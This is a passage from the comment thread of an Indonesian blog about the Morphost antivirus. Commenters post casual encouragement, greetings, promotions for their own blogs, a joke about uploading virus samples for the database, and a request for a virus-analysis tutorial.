    heheheheheheee……

    numpang absen ya bang..!!

  313. maridjo said

    halo bossssss,
    virtual drive lo koq nggak bisa upload ya ?????
    Cemana gua mau upload virus bosssss
    mungkin itu sebabnya database lo kekurangan virus ….
    tolong betulin boss ya
    sekalian promosi blog baru gua
    maridjo.wordpress.com
    masih coba-coba kok boss
    salam buat anak smansa medan yach
    dari hacker Kal-Bar yang guantengnya minta ampun
    10 jempol buat morphost dan pembuatnya

  314. gembala_sapi said

    M a j u t e r u s M O R P H O S T….!!!
    J a n g a n l u p a b o s s s a m a s a y a……

  315. MARIDJO said

    yes…tessss….tesssss……..
    met berjuang semoga morphost tetap menjadi AV tebaik
    gw mo nanya boss
    AV lo msh pke runtime library msvbvm60.dll ndak??
    jawab yahh
    email me at el_djo_uchiha@yahoo.co.id
    klao bisa mnta no hp dunk bosss
    hehehehe

  316. Hello, Tetap semangat!

    Maju terus Morphost…!!!!

    Kembangkan Terus!!!!

  317. Zein said

    mas minta tutorial ttg analisa virus donk..

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: